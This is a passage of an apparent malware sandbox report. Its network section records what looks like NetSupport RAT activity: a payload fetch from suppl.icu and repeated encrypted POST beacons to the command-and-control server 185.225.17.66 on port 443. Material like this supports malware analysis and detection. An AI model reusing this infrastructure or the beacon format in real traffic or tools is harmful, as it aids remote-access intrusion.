  603. "domain": "gidjshrvz.xyz"
  604.  
  605.  
  606. "ip": "192.35.177.64",
  607. "domain": "apps.identrust.com"
  608.  
  609.  
  610.  
  611. * Network Communication - ICMP:
  612.  
  613. * Network Communication - HTTP:
  614.  
  615. "count": 1,
  616. "body": "",
  617. "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
  618. "user-agent": "Microsoft-CryptoAPI/6.1",
  619. "method": "GET",
  620. "host": "apps.identrust.com",
  621. "version": "1.1",
  622. "path": "/roots/dstrootcax3.p7c",
  623. "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
  624. "port": 80
  625.  
  626.  
  627. "count": 1,
  628. "body": "",
  629. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  630. "user-agent": "Microsoft-CryptoAPI/6.1",
  631. "method": "GET",
  632. "host": "www.download.windowsupdate.com",
  633. "version": "1.1",
  634. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  635. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 88276\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  636. "port": 80
  637.  
  638.  
  639. "count": 1,
  640. "body": "",
  641. "uri": "http://suppl.icu/2.txt",
  642. "user-agent": "Embarcadero URI Client/1.0",
  643. "method": "GET",
  644. "host": "suppl.icu",
  645. "version": "1.1",
  646. "path": "/2.txt",
  647. "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: suppl.icu\r\n\r\n",
  648. "port": 80
  649.  
  650.  
  651. "count": 1,
  652. "body": "CMD=POLL\nINFO=1\nACK=1\n",
  653. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  654. "user-agent": "NetSupport Manager/1.3",
  655. "method": "POST",
  656. "host": "185.225.17.66",
  657. "version": "1.1",
  658. "path": "http://185.225.17.66/fakeurl.htm",
  659. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
  660. "port": 443
  661.  
  662.  
  663. "count": 1,
  664. "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  665. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  666. "user-agent": "NetSupport Manager/1.3",
  667. "method": "POST",
  668. "host": "185.225.17.66",
  669. "version": "1.1",
  670. "path": "http://185.225.17.66/fakeurl.htm",
  671. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  672. "port": 443
  673.  
  674.  
  675. "count": 1,
  676. "body": "",
  677. "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
  678. "user-agent": "",
  679. "method": "GET",
  680. "host": "geo.netsupportsoftware.com",
  681. "version": "1.1",
  682. "path": "/location/loca.asp",
  683. "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  684. "port": 80
  685.  
  686.  
  687. "count": 1,
  688. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  689. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  690. "user-agent": "NetSupport Manager/1.3",
  691. "method": "POST",
  692. "host": "185.225.17.66",
  693. "version": "1.1",
  694. "path": "http://185.225.17.66/fakeurl.htm",
  695. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 76\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  696. "port": 443
  697.  
  698.  
  699. "count": 1,
  700. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  701. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  702. "user-agent": "NetSupport Manager/1.3",
  703. "method": "POST",
  704. "host": "185.225.17.66",
  705. "version": "1.1",
  706. "path": "http://185.225.17.66/fakeurl.htm",
  707. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  708. "port": 443
  709.  
  710.  
  711. "count": 5,
  712. "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  713. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  714. "user-agent": "NetSupport Manager/1.3",
  715. "method": "POST",
  716. "host": "185.225.17.66",
  717. "version": "1.1",
  718. "path": "http://185.225.17.66/fakeurl.htm",
  719. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  720. "port": 443
  721.  
  722.  
  723.  
  724. * Network Communication - SMTP:
  725.  
  726. * Network Communication - Hosts:
  727.  
  728. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment